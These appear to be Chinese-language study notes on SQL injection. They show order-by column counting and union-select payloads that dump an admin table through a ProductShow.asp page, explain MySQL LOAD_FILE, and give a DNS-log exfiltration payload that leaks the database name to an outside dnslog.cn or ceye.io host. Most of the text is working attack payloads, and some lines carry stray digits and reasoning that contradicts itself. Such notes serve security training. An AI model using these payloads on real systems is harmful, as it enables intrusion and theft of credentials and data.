171 union select 1,2,3,4,5,6,7,8,9,10 from admin(由于union要求两个结果的字段数相同,这里需要select 10个,由于想知道一条结果第几个能够被显示,为了方便就10个字段依次是1,2,3,4)
说明一条结果中的第2,3,7,8,9字段会被回显
3171 union select 1,2,3,4,5,6,7,8,9,admin.* from admin 页面异常(如果正常说明admin有1个字段)
171 union select 1,2,3,4,5,6,7,8,admin.* from admin 页面异常(如果正常说明admin有2个字段)
一直到
171 union select admin.* from admin 页面异常(如果正常说明admin有10个字段)
说明admin最少有10个字段
这个页面查询的数据库有10个字段,但是admin表至少有10个,所有要换一个页面重新测试
4:8004/ProductShow.asp
105 order by 26 页面正常
105 order by 27 页面不正常
说明有ProductShow.asp页面查询的库有26个字段
105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
说明ProductShow.asp查询的数据库的一条结果中的第3,5,7,25字段会被回显,其中25在图片的地址中
6105 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin 页面正常
105 union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin 页面异常
说明admin表有16个字段,因为10+16=26刚好等于ProductShow.asp查询表的字段数
105 union select 1,2,3,4,5,6,7,8,9,admin.*,26 from admin
让25位置显示admin最后一个字段
LOAD_FILE() 读取文件的函数
读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。
这个功能不是默认开启的,需要在mysql配置文件加一句 secure_file_priv=
UNC路径
\\zkaq.sq8o3d.ceye.io\abc 访问zkaq.0cv5gr.ceye.io下的abc共享文件夹
select load_file(concat(\'//\',(select database()),\'.v8bfoy.dnslog.cn/abc\'))
数据库去访问“库名.v8bfoy.dnslog.cn”的服务器下的共享文件夹abc
然后“库名.v8bfoy.dnslog.cn”的域名的解析会在v8bfoy.dnslog.cn服务器下进行,v8bfoy.dnslog.cn会有域名解析记录,从解析记录里就可以得到库名
免费的dnslog平台 不用注册 不用登陆 不采集任何信息
点击Get SubDomain 给你一个二级域名让你使用
点击Refresh Record 查看给你的那个二级域名的DNS解析情况